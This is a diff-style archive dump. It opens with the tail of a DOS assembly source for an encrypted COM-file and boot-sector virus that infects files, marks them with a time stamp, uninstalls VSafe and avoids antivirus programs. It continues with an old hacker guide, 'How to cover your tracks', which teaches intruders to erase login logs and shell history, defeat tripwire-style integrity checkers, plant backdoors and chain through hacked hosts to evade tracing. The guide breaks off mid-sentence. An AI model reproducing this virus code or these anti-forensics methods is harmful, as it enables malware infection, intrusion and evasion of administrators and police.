+; Save 3 bytes
+
+        MOV     ax,word ptr DS:[File_buffer -Reloc]
+        MOV     DS:[ofs Rest1 -Reloc],ax
+        MOV     al,byte ptr DS:[File_buffer -Reloc +2]
+        MOV     DS:[ofs Rest2 -Reloc],al
+
+        CALL    Seek_EOF
+
+; file smaller than xxxx bytes ?
+
+        CMP     AX,F_Min_LengthCOM
+        JB      Infect_Ret
+
+; file larger than xxxx bytes ?
+
+        CMP     AX,F_Max_LengthCOM
+        JA      Infect_Ret
+
+
+        CALL    Padding
+
+
+; Construct index for decryptor
+
+        PUSH    AX
+
+; layer 1
+        ADD     AX,100h+ (ofs E1_Encrypted_Code-ofs Vir_Start)-Camouf
+        MOV     DS:[ofs E1_Idx_Val -Reloc],AX
+
+; layer 2
+        pop     ax
+        push    ax
+
+        ADD     AX,100h+ (ofs E2_Encrypted_Code-ofs Vir_Start)
+        MOV     DS:[ofs E2_Idx_Val -Reloc],AX
+
+; layer 3
+        pop     ax
+        push    ax
+
+        ADD     AX,100h+ (ofs E3_Encrypted_Code-ofs Vir_Start)
+        MOV     DS:[ofs E3_Idx_Val -Reloc],AX
+
+
+        POP     AX
+
+; construct and insert a JUMP-INSTR.
+
+        MOV     byte ptr DS:[File_buffer -Reloc],0E9h
+        SUB     AX,3
+        MOV     word ptr DS:[File_buffer+1 -Reloc],AX
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Attach:
+
+; write body at EOF
+
+        MOV     AH,40h
+        MOV     CX,Virus_Length
+        MOV     DX,ofs Buffer -Reloc
+        CALL    Encrypt_Virus
+        INT     21h
+        JB      Infect_Ret
+
+; write JUMP to TOF
+
+        MOV     AL,0
+        CALL    Seek_TOF
+
+        MOV     AH,40h
+        MOV     CX,Header_Length
+        MOV     DX,ofs File_buffer -Reloc
+        INT     21h
+
+; restore time stamps
+
+        mov     AX,5701h
+        mov     cx,cs:[ofs Old_Time -Reloc]
+        mov     dx,cs:[ofs Old_Date -Reloc]
+        and     cl,11100000b
+        or      cl,Time_Stamp                      ; Mark with Time-ID
+        INT     21h
+
+Infect_Ret:
+        RET
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Padding:
+        MOV     AH,AL
+        MOV     AL,16
+        SUB     AL,AH
+        AND     AX,1+2+4+8
+        MOV     DX,AX
+
+; seek forward
+        MOV     AL,01h
+        call    Seek_File
+        ret
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Deinstall_Vsafe:
+        pusha
+        push    ds es
+
+        MOV     DX,5945h
+        MOV     AX,0FA01h
+        INT     16h
+
+        pop     es ds
+        popa
+        ret
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Check_If_AV_Name proc near
+        cmp     byte ptr es:[di.SFT_File_Name],"L"
+        jz      Found_AV_Name
+        cmp     byte ptr es:[di.SFT_File_Name],"-"
+        jz      Found_AV_Name
+        cmp     word ptr es:[di.SFT_File_Name],"BT"
+        jz      Found_AV_Name
+        cmp     word ptr es:[di.SFT_File_Name],"CS"
+        jz      Found_AV_Name
+        cmp     word ptr es:[di.SFT_File_Name],"-F"
+        jz      Found_AV_Name
+        cmp     word ptr es:[di.SFT_File_Name],"IV"
+        jz      Found_AV_Name
+Found_AV_Name:
+        ret
+Check_If_AV_Name endp
+;----------------------------------------------------------------------------
+
+
+
+
+;----------------------------------------------------------------------------
+Seek_EOF:
+        MOV     AL,02h
+Seek_TOF:
+        XOR     DX,DX
+Seek_File:
+        MOV     AH,42h
+        XOR     CX,CX
+        INT     21h
+        RET
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Call_Old_Int21 PROC NEAR
+        pushf
+        call    dword ptr cs:(ofs Old_Int_21 -Reloc)
+        ret
+Call_Old_Int21 ENDP
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Call_Old_Int2F PROC NEAR
+        pushf
+        call    dword ptr cs:(ofs Old_Int_2F -Reloc)
+        ret
+Call_Old_Int2F ENDP
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+New_Int_24:
+        MOV     AL,03h
+        IRET
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Old_Int_13      dd      0
+Old_Int_1C      dd      0
+Old_Int_21      dd      0
+
+Old_Int_2f      dd      0
+
+Old_Time        dw      0
+Old_Date        dw      0
+
+Handle          dw      0
+
+; If Int 21h allready captured then 1 else 0
+Got_Int_21      db      0
+
+File_SizeHi     dw      0
+File_SizeLo     dw      0
+
+Padded          dw      0
+;----------------------------------------------------------------------------
+
+
+
+
+;----------------------------------------------------------------------------
+BS_first_word   dw      0
+Old_BS_code     db      32 dup ('B')
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+; The first word of the PAR/BS is stored here
+
+JBS_first_word:
+        jmp     $ + 60h
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Start_JBoot:
+        XOR     DI,DI
+        MOV     SI,7C00h
+
+        CLI
+        MOV     SP,SI
+        MOV     SS,DI
+        STI
+
+; read xx sectors to 7e00h
+
+        MOV     ES,DI
+        MOV     AX,0204h                        ; !!!!!!  Sectors !!!!!!
+        MOV     BX,7c00h+512
+
+        MOV     CX,1234h
+        ORG     $-2
+Ptc_CX  dw      0004h
+
+        MOV     DX,1234h
+        ORG     $-2
+Ptc_DX  dw      0080h
+
+        nop
+        nop
+
+        INT     13h
+
+; Jump to the reload code from 2 sectors
+; The offset in the BS/PAR where this instuction is executed is at
+; BS/PAR:60h+($-Start_Jboot)
+
+        jmp     $ + 512 - ($-Start_Jboot+60h)       ;+512 -125
+;----------------------------------------------------------------------------
+
+
+
+
+;----------------------------------------------------------------------------
+        db      " [[  Cú0úDúEúWúAúR  ]]  <32>  Germany  1995  "
+        db      "Virtually called to life & survival by"
+
+        db      "RGOEPMSQO & NJOENBOJBD"
+
+        db      " ==>= AllE GUtEN DiNGE SiND DREi  ==>=  "
+
+        db      0
+;----------------------------------------------------------------------------
+
+
+Encrypted_Code_End      equ     $
+
+
+;----------------------------------------------------------------------------
+File_buffer:
+        db      Header_Length dup ('H')
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+; here is the virus copied and encrypted
+Buffer  equ     $
+;----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+CODE    ENDS
+        END     Sample
+
+
+; CODEWAR.ASM
+

Papers/cover-1.txt

@@ -0,0 +1,897 @@
+ ------------------------------------------------------------------------------
+
+
+
+               ################################################
+               #                                              #
+               #           HOW TO COVER YOUR TRACKS           #
+               #                                              #
+               ################################################
+
+
+
+                       PART ONE : THEORY & BACKGROUND
+
+
+
+                              I. INTRODUCTION
+                             II. MENTAL
+                            III. BASICS
+                             IV. ADVANCED
+                              V. UNDER SUSPECT
+                             VI. CAUGHT
+                            VII. PROGRAMS
+                           VIII. LAST WORDS
+
+
+
+
+     I. INTRODUCTION
+     ----------------------------------------------------------------------
+
+     Please excuse my poor english - I'm german so it's not my mother
+     language I'm writing in. Anyway if your english is far better than
+     mine, then don't think this text hasn't got anything to offer you.
+     In contrast. Ignore the spelling errors & syntax - the contents
+     of this document is important ...
+
+     NOTE : This text is splitted into TWO parts.
+            The first one, this, teachs about the background and theory.
+            The second just shows the basics by an easy step-by-step
+            procedure what to type and what to avoid.
+            If you are too lazy to read this whole stuff here (sucker!)
+            then read that one. It's main targets are novice unix hackers.
+
+     If you think, getting the newest exploits fast is the most important
+     thing you must think about and keep your eyes on - you are wrong.
+     How does the best exploit helps you once the police has seized your
+     computer, all your accounts closed and everything monitored?
+     Not to mention the warrants etc.
+     No, the most important thing is not to get caught.
+     It is the FIRST thing every hacker should learn, because on many
+     occasions, especially if you make your first hacks at a site which
+     is security conscious because of many break-ins, your first hack can
+     be your last one (even if all that lays back a year ago "they" may
+     come up with that!), or you are too lazy to change your habits
+     later in your career.
+     So read through these sections carefully!
+     Even a very skilled hacker can learn a bit or byte here.
+
+     So this is what you find here:
+          Section I   - you are reading me, the introduction
+          Section II  - the mental things and how to become paranoid
+                      1. Motivation
+                      2. Why you must become paranoid
+                      3. How to become paranoid
+                      4. Stay paranoid
+          Section III - the basics you should know BEFORE begin hacking
+                      1. Preface
+                      2. Secure Yourself
+                      3. Your own account
+                      4. The LOGs
+                      5. Don't leave a trace
+                      6. Things you should avoid
+          Section IV  - the advanced techniques you should take a notice of
+                      1. Preface
+                      2. Prevent Tracing of any kind
+                      3. Find and manipulate any log files  
+                      4. Check the syslog configuration and logfile
+                      5. Check for installed security programs
+                      6. Check the admins  
+                      7. How to "correct" checksum checking software  
+                      8. User Security Tricks
+                      9. Miscellaneous
+          Section V   - what to do once you are under suspect
+          Section VI  - the does and dont's when you got caught
+          Section VII - a short listing of the best programs for hiding
+          Section VIII- last words, the common bullshit writers wanna say
+
+     So read carefully and enlighten yourself.
+
+
+
+
+
+
+     II. MENTAL
+     ----------------------------------------------------------------------
+
+     CONTENTS:           1. Motivation
+                         2. Why you must become paranoid
+                         3. How to become paranoid
+                         4. Stay paranoid
+
+
+   * 1. MOTIVATION *
+     The mental aspect is the key to be successful in anything.
+
+     It's the power to motivate yourself, fight on if it hurts,
+     being selfdisciplined, paranoid & realistic, calculate risks
+     correctly and do stuff you don't like but are important even
+     if you'd like to go swimming now.
+
+     If you can't motivate yourself to program important tools,
+     wait for the crucial time to hit the target, then you'll never
+     get anywhere with your "hacks"
+
+     A successful and good hacker must meet these mental requirements.
+     It's like doing bodybuilding or a diet - you can learn it
+     if you really try.
+
+     EVEN THE BEST KNOWLEDGE WON'T HELP YOU UNTIL YOU ARE REALLY
+     CONCERNED TO DO THE PREVENTIONS AND ACTUAL MAKE THEM !
+
+
+   * 2. WHY YOU MUST BECOME PARANOID *
+     It's right that normally being paranoid is not something which
+     makes your life happier.
+     However if you aren't expecting the worst, anything can hit you and
+     throw you off balance. And you are risking very much with your doings.
+     In your normal life you don't need to worry much about cops, thieves
+     and therelike. But if you are on the other side remember that you make
+     other people a hard life and bring them nightmares plus work - and
+     they want to stop you.
+     Even if you don't feel like committing a crime - you actually do.
+     Hacker-Witchhunting pops up fast and gets everyone who might be involved.
+     It's the sad thing : YOU ARE GUILTY UNTIL PROVEN OTHERWISE !
+     Once you've got the stigma being a hacker you'll never get it off.
+     Once having an entry in your police record it's very hard to find a job.
+     Especially no software company, even no computer related company will
+     ever hire you, they will be afraid of your skills, and you will see
+     yourself being forced to emmigrate or your life lost.
+     Once you fall down only a few can get up again.
+
+     Become paranoid!
+     Protect yourself!
+     Remember you have got everything to loose!
+     Never feel silly doing THAT extraordinary action against tracing!
+     Never bother if someone laughs on your paranoid doing!
+     Never be too lazy or tired to modify the logs!
+     A hacker must do his work 100% !
+
+
+   * 3. HOW TO BECOME PARANOID *
+     If you've read the part above and you think thats true, it's easy -
+     you've got already become paranoid. But it must become a substantial
+     part of your life. If you made it becoming a good hacker always think
+     about whom to tell what, and that you phone calls and emails might be
+     monitored. Always the reread the section above.
+
+     If the above didn't helped you, then think about what happens if
+     you are caught. Would your girlfriend stay at your side? Even if
+     her father speaks a hard word? Do you want to see your parents cry?
+     Thrown from your school/university/job?
+
+     Don't give this a chance to happen!
+
+     If even this is not enough to motivate you:
+     KEEP AWAY FROM HACKING!
+     You are a danger to the whole hacking society and your friends !
+
+
+   * 4. STAY PARANOID *
+     I hope you learned now why it is important to become paranoid.
+     So stay paranoid. One mistake or lazy moment could suffice to ruin
+     your life or career.
+
+     Always remember the motivation to do it.
+
+
+
+
+
+
+     III. BASICS
+     ----------------------------------------------------------------------
+
+     CONTENTS :          1. Preface
+                         2. Secure Yourself
+                         3. Your own account
+                         4. The LOGs
+                         5. Don't leave a trace
+                         6. Things you should avoid
+
+
+   * 1. PREFACE *
+     You should know this and practice it before you start your first hack.
+     These are the absolute basics, without them you are in trouble soon.
+     Even an experienced hacker can find a new hint/info in here.
+
+
+   * 2. SECURE YOURSELF *
+     What if a SysAdmin reads your email?
+     What if your phone calls are recorded by the police?
+     What if the police seizes your computer with all your hacking data on it?
+
+     If you don't receive suspicious email, don't talk about hacking/phreaking
+     on the phone and haven't got sensitive/private files on your harddisk
+     then you don't need to worry. But then again you aren't a hacker.
+     Every hacker or phreaker must keep in touch with others and have got
+     his data saved somewhere.
+
+     Crypt every data which is sensitive!
+     Online-Harddisk-Crypter are very important and useful:
+       There are good harddisk crypters free available an the internet, which
+       behave fully transparent to your operating systems, i.e. the packages
+       listed below are tested and were found to be a hacker's first-choice:
+          - If you use MsDos get SFS v1.17 or SecureDrive 1.4b
+          - If you use Amiga get EnigmaII v1.5
+          - If you use Unix  get CFS v1.33
+     File Crypters: You can use any, but it should use one of the well known
+       and secure algorythms. NEVER use a crypting program which can be
+       exported because their effective keylengths are reduced!
+          - Triple DES
+          - IDEA
+          - Blowfish (32 rounds)
+     Encrypt your emails!
+          - PGP v2.6.x is used most so use it too.
+     Encrypt your phonecalls if you want to discuss important things.
+          - Nautilus v1.5a is so far the best
+     Encrypt your terminal sessions when connected to a unix system.
+     Someone might be sniffing, or monitoring your phone line.
+          - SSH is the so far most secure
+          - DES-Login is fine too
+
+     Use strong passwords, non-guessable passwords which are not mentioned
+     in any dictionary. They should seem random but good to remember for
+     yourself. If the keylength is allowed to be longer than 10 chars,
+     use that, and choose a sentence from a book, slightly modified.
+     Please crypt phonenumbers of hacker friends twice. And call them from
+     payphones/officephones/etc. only, if you don't encrypt the conversation.
+
+     The beginner only needs PGP, a filecrypter and an online-hardisk-crypter.
+     If you are really deep into hacking remember to encrypt everything.
+
+     Make a backup of your data (Zip-Drive, other harddisk, CD, Tape),
+     crypted of course, and store it somewhere which doesn't belong to any
+     computer related guy or family member and doesn't belong to your house.
+     So if a defect, fire or fed raid occures you got a backup of your data.
+
+     Keep written notices only as long as you really need them. Not longer.
+     Keeping them in an encrypted file or on an encrypted partition is much
+     more secure. Burn the papers once you don't need them anymore.
+     You can also write them down with a crypt algorythm which only you
+     know of, but don't tell others and don't use it too often or it can be
+     easily analyzed and broken.
+
+     Really hardcore or ultra paranoid hackers should consider too the
+     TEMPEST Project. Cops, spies and hackers could monitor all your
+     doings. A well equipted man could have *anything* he wants :
+     Electronic pulse emanation can be catched from more than 100 meters
+     away and show your monitor screen to somebody else, a laserpoint to
+     your window to hear private conversations, or identifying hifrequency
+     signals of keyboard clicks ... so possiblities are endless
+     Lowcost prevention can be done by electronic pulse jammers and 
+     therelike which become available on the public market, but I don't
+     think this is secure enough to keep anyone dedicated away.
+
+
+
+   * 3. YOUR OWN ACCOUNT *
+     So let's talk about your own account. This is your real account you
+     got at your school/university/job/provider and is associated with
+     your name. Never forget to fail these rules:
+
+     Never do any illegal or suspicious things with your real accounts!
+     Never even try to telnet to a hacked host!
+     Security mailing lists are okay to read with this account.
+     But *everything* which *seems* to have to do with hacking must be
+     either encrypted or be deleted as once.
+     Never leave/save hacking/security tools on your account's harddisk.
+     If you can, use POP3 to connect to the mailserver and get+delete your
+     email (or do it in an other way if you are experienced enough using unix)
+     Never give out your real email if your realname is in your .plan file
+     and/or geco field (remember the EXPN command from sendmail ...)
+     Give it only to guys who you can trust and are also security conscious,
+     because if they are caught you may follow (or if it's a fed, not a hacker)
+     Exchange emails with other hackers only if they are encrypted (PGP)
+     SysAdmins OFTEN snoop user directories and read other's email!
+     Or another hacker might hack your site and try to get your stuff!
+
+     Never use your account in a way which shows interest in hacking.
+     Interest in security is okay but nothing more.
+
+
+   * 4. THE LOGS *
+     There are 3 important log files:
+          WTMP - every log on/off, with login/logout time plus tty and host
+          UTMP - who is online at the moment
+          LASTLOG - where did the logins come from
+     there exist others, but those will be discussed in the advanced section.
+     Every login via telnet, ftp, rlogin and on some systems rsh are written
+     to these logs. It is VERY important that you delete yourself from those
+     logfiles if you are hacking because otherwise they
+          a) can see when did you do the hacking exactly
+          b) from which site you came
+          c) how long you were online and can calculate the impact
+
+     NEVER DELETE THE LOGS! It's the easiest way to show the admin that
+     a hacker was on the machine. Get a good program to modify the logs.
+     ZAP (or ZAP2) is often mentioned as the best - but in fact it isn't.
+     All it does is overwriting the last login-data of the user with zeros.
+     CERT already released simple programs which check for those zero'ed
+     entries. So thats an easy way to reveil the hacker to the admin too.
+     He'll know someone hacked root access and then all you work was worthless.
+     Another important thing about zap is that it don't report if it can't
+     find the log files - so check the paths first before compiling!
+     Get either a program which CHANGES the data (like CLOAK2) or a really
+     good one which DELETES the entries (like CLEAR).
+     
+
+     Normally you must be root to modify the logs (except for old distributions
+     which have got utmp and wtmp world-writable). But what if you didn't
+     made it hacking root - what can you do? Not very much :
+     Do a rlogin to the computer you are on, to add a new unsuspicous LASTLOG
+     data which will be displayed to the owner when he logs on next time.
+     So he won't get suspicious if he sees "localhost".
+     Many unix distributions got a bug with the login command. When you
+     execute it again after you logged already on, it overwrites the
+     login-from field in the UTMP (which shows the host you are coming
+     from!) with your current tty.
+
+     Where are these log files by default located? 
+     That depends on the unix distribution.
+     UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
+     WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
+     LASTLOG :  /usr/var/adm or /usr/adm or /var/adm or /var/log
+     on some old unix dists the lastlog data is written into $HOME/.lastlog
+
+
+   * 5. DON'T LEAVE A TRACE *
+     I encountered many hackers who deleted themselves from the logs.
+     But they forgot to erase other things they left on the machines :
+     Files in /tmp and $HOME
+
+     Shell History
+     It should be another as you current login account uses.
+     Some shells leave a history file (depends on enviroment configuration)
+     with all the commands typed. Thats very bad for a hacker.
+     The best choice is to start a new shell as your first command after
+     logging in, and checking every time for a history file in you $HOME.
+     History files :
+        sh  : .sh_history
+        csh : .history
+        ksh : .sh_history
+        bash: .bash_history
+        zsh : .history
+     Backup Files :
+        dead.letter, *.bak, *~
+
+     In other words: do an "ls -altr" before you leave!
+
+     Here're 4 csh commands which will delete the .history when you log
+     out, without any trace.
+          mv .logout save.1
+          echo rm .history>.logout
+          echo rm .logout>>.logout
+          echo mv save.1 .logout>>.logout
+
+
+
+   * 6. THINGS YOU SHOULD AVOID *
+     Don't crack passwords on an other machine than your own, and then
+     only on a crypted partition. If you crack them on a e.g. university
+     and the root sees your process and examines it not only your hacking
+     account is history but also the site from which the password file is
+     and the university will keep all eyes open to watch out for you.
+     Download/grab the passwd data and crack them on a second computer or
+     in a background process. You don't need many cracked accounts, only a few.
+
+     If you run important programs like ypx, iss, satan or exploiting
+     programs then rename them before executing or use the small common
+     source to exchange the executed filename in the process list ... ever
+     security conscious user (and of course admin) knows what's going on
+     if he sees 5 ypx programs running in the background ...
+     And of course if possible don't enter parameters on the command line
+     if the program supports an interactive mode, like telnet.
+     Type "telnet" and then "open target.host.com" ... which won't show
+     the target host in the process list as parameter.
+
+     If you hacked a system - don't put a suid shell somewhere!
+     Better try to install some backdoors like ping, quota or login and
+     use fix to correct the atime and mtime of the file if you don't
+     have got another possiblity.
+
+
+
+
+
+
+     IV. ADVANCED
+     ----------------------------------------------------------------------
+
+     CONTENTS :          1. Preface
+                         2. Prevent Tracing of any kind
+                         3. Find and manipulate any log files  
+                         4. Check the syslog configuration and logfile
+                         5. Check for installed security programs
+                         6. Check the admins  
+                         7. How to "correct" checksum checking software  
+                         8. User Security Tricks
+                         9. Miscellaneous
+
+
+   * 1. PREFACE * 
+     Once you installed your first sniffer and begin to hack worldwide
+     then you should know and use these checks & techniques!
+     Use the tips presented here - otherwise your activity will be over soon.
+
+
+   * 2. PREVENT TRACING OF ANY KIND * 
+     Sometimes your hacking will be noticed. Thats not a real problem -
+     some of your sites will be down but who cares, there are enough
+     out there to overtake. The *very* dangerous thing is when they try
+     to trace you back to your origin - to deal with you - bust you!
+
+     This short chapter will tell you every possiblity THEY have to trace
+     you and what possibilities YOU have to prevent that.
+
+     * Normally it should be *no* problem for the Admin to identify the
+       system the hacker is coming from by either : checking the log entries
+       if the hacker was really lame, taking a look at the sniffer output
+       the hacker installed and he's in too, any other audit software like
+       loginlog, or even show all estrablished connections with "netstat"
+       if the hacker is currently online - expect that they'll find out!
+       Thats why you *need* a gateway server.
+
+     * A gateway server in between - what is it?
+       Thats one of many many servers you have accounts on, which are
+       absolutely boring systems and you have got root access on.
+       You need the root access to alter the wtmp and lastlog files
+       plus maybe some audit logs do nothing else on these machines!
+       You should change the gateway servers on a regular basis, say
+       every 1-2 weeks, and don't use them again for at least a month.
+       With this behaviour it's unlikely that they will trace you back
+       to your next point of origin : the hacking server
+
+     * Your Hacking Server - basis of all activity
+       From these server you do begin hacking. Telnet (or better : remsh/rsh)
+       to a gateway machine and then to the target.
+       You need again root access to change the logs.
+       You should change your hacking server every 2-4 weeks.
+
+     * Your Bastian/Dialup server.
+       This is the critical point. Once they can trace you back to your
+       dialup machine you are already fried. A call to the police, a line
+       trace and your computer hacking activity is history - and maybe
+       the rest of your future too.
+       You *don't* need root access on a bastion host. Since you only
+       connect to it via modem there are no logs which must be changed.
+       You should use a different account to log on the system every day,
+       and try to use those which are seldom used.
+       Don't modify the system in any way!
+       You should've got at least 2 bastion host systems you can dialup
+       to and switch between them every 1-2 month.
+
+       Note: If you have got the possiblity to dialup different systems
+             every day (f.e. due blueboxing) then do so. you don't need
+             a hacking server then.
+
+     * Do bluebox/card your call or use an outdial or any other way.
+       So even when they capture back your bastion host, they can't
+       trace you (easily) ...
+       For blueboxing you must be cautious, because germany and the phone
+       companies in the USA do have surveillance systems to detect
+       blueboxers ... At&t traces fake cred card users etc.
+       Using a system in between to transfer your call does on the one side
+       make tracine more difficult - but also exposes you to the rish being
+       caught for using a pbx etc. It's up to you.
+       Note too that in f.e. Denmark all - ALL - calling data is saved!
+       Even 10 years after your call they can prove that *you* logged on
+       the dialup system which was used by a hacker ...
+
+     - Miscellaneous
+       If you want to run satan, iss, ypx, nfs filehandle guessing etc.
+       then use a special server for this. don't use it to actually
+       telnet/rlogin etc. to a target system, only use it for scanning.
+       Connect to it as if it were a gateway server.
+
+       Tools are out there which binds to a specific port, and when a
+       connection is established to this port, it's automatically opening
+       a connection to another server some other just act like a shell on the
+       system, so you do a "telnet" from this socket daemon too.
+       With such a program running you won't be written in any log except
+       firewall logs. There are numerous programs out there which do that
+       stuff for you. 
+
+       If possible, the hacking server and/or the gateway machine should
+       be located in a foreign country!
+       Because if your breakin (attempt) was detected and your origin host
+       identified then most admins will tend to give up to hunt after you.
+       Even if the feds try to trace you through different countries it
+       will delay them by at least 2-10 weeks ...
+
+     # Conclusion : If you hack other stuff than univerisities then
+       do it this way! Here is a small picture to help you ;-)
+
+  +-------+     ~--------------->     +-------------+     +-----------+
+  |+-----+|     >hopefully      >     |one of at    |     |one of many|
+  || YOU || --> >a trace-safe   > --> |least 3      | --> |hacking    |
+  |+-----+|     >dial possiblity>     |bastion hosts|     |server     |
+  +-------+     ~--------------->     +-------------+     +-----------+
+                                                                |
+                                                                |
+                                                                v
+           +-----------------+             +--------+     +-----------+
+           |maybe additional |             |  the   |     |one hacked |
+           |server from      | ... <-- ... |  main  | <-- |server as  |
+           |internal network |             | target |     |gateway    |
+           +-----------------+             +--------+     +-----------+
+
+
+
+   * 3. FIND AND MANIPULATE ANY LOG FILES *
+     It's important that you find all logfiles - even the hidden ones.
+     To find any kind of logfiles there are two easy possibilities :
+     1) Find all open files.
+        Since all logfiles must write somewhere, get the cute program
+        LSOF - LiSt Open Files - to see them ... check them ... and
+        if necessary correct them.
+     2) Search for all files changed after your login.
+        After your login do a "touch /tmp/check" then work on.
+        Later just do a "find / -newer /tmp/check -print" and check them
+        if any of those are audit files. see>check>correct.
+        Note that not all versions of find support the -newer option
+        You can also do a "find / -ctime 0 -print" or "find / -cmin 0 -print"
+        to find them.
+
+     Check all logfiles you find. Normally they are in /usr/adm, /var/adm or
+     /var/log.
+     If things are logged to @loghost then you are in trouble. You need
+     to hack the loghost machine to modify the logs there too ...
+
+     To manipulate the logs you can either do things like "grep -v", 
+     or do a linecount with wc, and then cut off the last 10 lines with
+     "head -LineNumbersMinus10", or use an editor etc.
+     If the log/audit files are not textfiles but datarecords ... identify
+     the software which writes the logfiles. Then get the sourcecode. Then
+     find the matching header file which defines the structure of the file.
+     Get zap, clear, cloak etc. and rewrite it with the header file to use
+     with this special kind of logfile (and it would be kind to publish your
+     new program to the hacker society to safe others much work)
+
+     If accouting is installed then you can use the acct-cleaner from zhart,
+     also in this release - it works and is great!
+
+     A small gimmick if you must modify wtmp but can't compile a source and
+     no perl etc. is installed (worked on SCO but not on linux) :
+     Do a uuencode of wtmp. Run vi, scroll down to the end of the file, and
+     and delete the last 4 (!) lines beginning with "M" ... then save+exit,
+     uudecode. Then the last 5 wtmp entries are deleted ;-)
+
+     If the system uses wtmpx and utmpx as well you are in trouble ...
+     I don't know any cleaner so far who can handle them.
+     Program one and make it available for the scene.
+
+
+
+   * 4. CHECK THE SYSLOG CONFIGURATION AND LOG *
+     Most programs use the syslog function to log anything they want.
+     It's important to check the configuration where syslog does print
+     special types.
+     The config file is /etc/syslog.conf - and I won't tell you here what
+     the format is and what each entry means. Read the manpages about it.
+     Important for you are kern.*, auth.* and authpriv.* types.
+     Look where they are written too: files can be modified. If forwarded
+     to other hosts you must hack those too. If messages are sent to a user,
+     tty and/or console you can do a small trick and generate false log
+     messages like "echo 17:04 12-05-85 kernel sendmail[243]: can't resolve
+     bla.bla.com > /dev/console" or whichever device you want to flood so
+     that the message you want to hide simply scrolls over the screen.
+     These log files are *very* important! Check them.
+     
+
+   * 5. CHECK FOR INSTALLED SECURITY PROGRAMS
+     On most security conscious sites, there are security checkers run by
+     cron. The normal directory for the crontabs are /var/spool/cron/crontabs.
+     Check out all entries, especially the "root" file and examine the files
+     they run. For just a fast investigation of the crontabs of root type
+     "crontab -l root".
+
+     Some of those security tools are most time also installed on the admins'
+     accounts. Some of them (small utils to check wtmp, and if a sniffer is
+     installed) are in their ~/bin. 
+     Read below to identify those admins and check their directories.
+     
+     Internal checking software can be tiger, cops, spi, tripwire, l5,
+     binaudit, hobgoblin, s3 etc.
+
+     You must examine them what they report and *if* they would report
+     something that would be a sign of your breakin.
+     If yes you can - update the data files of the checker (learn mode)
+                      so that it won't report that type anymore
+                    - reprogram/modify the software so that they don't report
+                      it anymore. (I *love* fake cpm programs ;-)
+                    - if possible remove the e.g. backdoor you installed
+                      and try to do it in another way.
+     
+
+
+   * 6. CHECK THE ADMINS *
+     It is important for you to check the sysops for the security counter-
+     measures they do - so first you need to know which normal accounts are
+     they use.
+     You can check the .forward file of root and the alias entry of root.
+     Take a look into the sulog and note those people who did a successful
+     su to root. Grab the group file and examine the wheel and admin group
+     (and whatever other group are in this file which are related to
+     administration). Also grep'ing the passwd file for "admin" will reveile
+     the administrators.
+     Now you should know who the 1-6 administrators on the machines are.
+     Change into their directories (use chid.c, changeid.c or similar to
+     become the user if root is not allowed to read every file) and check
+     their .history/.sh_history/.bash_history to see what commands they type
+     usually. Check their .profile/.login/.bash_profile files to see what
+     aliases are set and if auto-security checks or logging are done.
+     Examine their ~/bin directory! Most times compiled security checking
+     programs are put there! And of course take a look into each directory
+     they've got beside that (ls -alR ~/).
+     If you find any security related stuff, read 5.) for possibilities to
+     bypass those protections.
+
+
+
+   * 7. HOW TO "CORRECT" CHECKSUM CHECKING SOFTWARE *
+     Some admins really fear hacker and install software to detect changes
+     of their valuable binaries. If one binary is tampered with, next time
+     the admin does a binary check, it's detected.
+     So how can you a) find out if such binary checkers are installed
+     and b) how to modify them so you can plant in your trojan horse?
+
+     Note that there are many binary checker out there and it's really easy
+     to write one - takes only 15 minutes - and can be done with a small
+     script. So it's hard to find such software if it's installed.
+     Note that internal security checking software sometimes also support such
+     checking. Here are some widely used ones :
+
+     SOFTWARE : STANDARD PATH : BINARY FILENAMES
+     tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
+     binaudit : /usr/local/adm/audit : auditscan 
+     hobgoblin : ~user/bin : hobgoblin
+     raudit : ~user/bin : raudit.pl
+     l5 : compile directory : l5
+
+     But as you can see there are too much possibilities! The software or
+     database could even be on an normally unmounted disk or NFS exported
+     partition of another host. Or the checksum database is on a write
+     protected medium. There are too much possibilities. But normally you can
+     just do the fast check if the above packages are installed and if not
+     go on exchanging binaries. If you *don't* find them but it actually *is*
+     a very well secured site then you should NOT tamper with the binaries!
+     They sure have got them hidden very well.
+
+     But what do you do when you find that software installed and you can
+     modify them (e.g. not a write protected medium, or something that can
+     be bypasswd - for example unmounting the disk and remounting writable)?
+     You've got 2 possibilities :
+     First you can just check the parameters of the software and run an
+     "update" on the modified binary. For example for tripwire that's
+     "tripwire -update /bin/target".
+     Seconds you can modify the filelist of the binaries being checked -
+     removing the entry of the replaced one.
+     Note that you should also check if the database file itself is checked
+     too for changes! If yes - update/delete the entry as well.
+
+
+
+   * 8. USER SECURITY TRICKS *
+     This is a rare thing and is only for sake of completeness.
+     Some users, named admins and hackers, usually don't want their own
+     accounts to be used by someone else. That's why they sometimes put
+     some security features into their startup files.
+     So check all dotfiles (.profile, .cshrc, .login, .logout etc.)
+     what commands they execute, what history logging and which searchpath
+     they set. If f.e. $HOME/bin comes before /bin in the search path you
+     should check the contents of this directory ... maybe there's a program
+     called "ls" or "w" installed which logs the execution time and after
+     that executing the real program.
+     Other check automatically the wtmp and lastlog files for zap usage,
+     manipulation of .rhosts, .Xauthority files, active sniffers etc.
+     Never mess with an account a unix wizard is using!     
+
+
+
+   * 9. MISCELLANEOUS *
+     Finally, before some last words about being under suspect or caught,
+     here are some miscellaneous things which a worth to take a notice off.
+
+     Old telnet clients do export the USER variable. An administrator who
+     knows that and modified the telnetd can get all user names with that
+     and so identify the account you are hacking from, once he notices you.
+     The new clients have been fixed - but a clever admin has got other
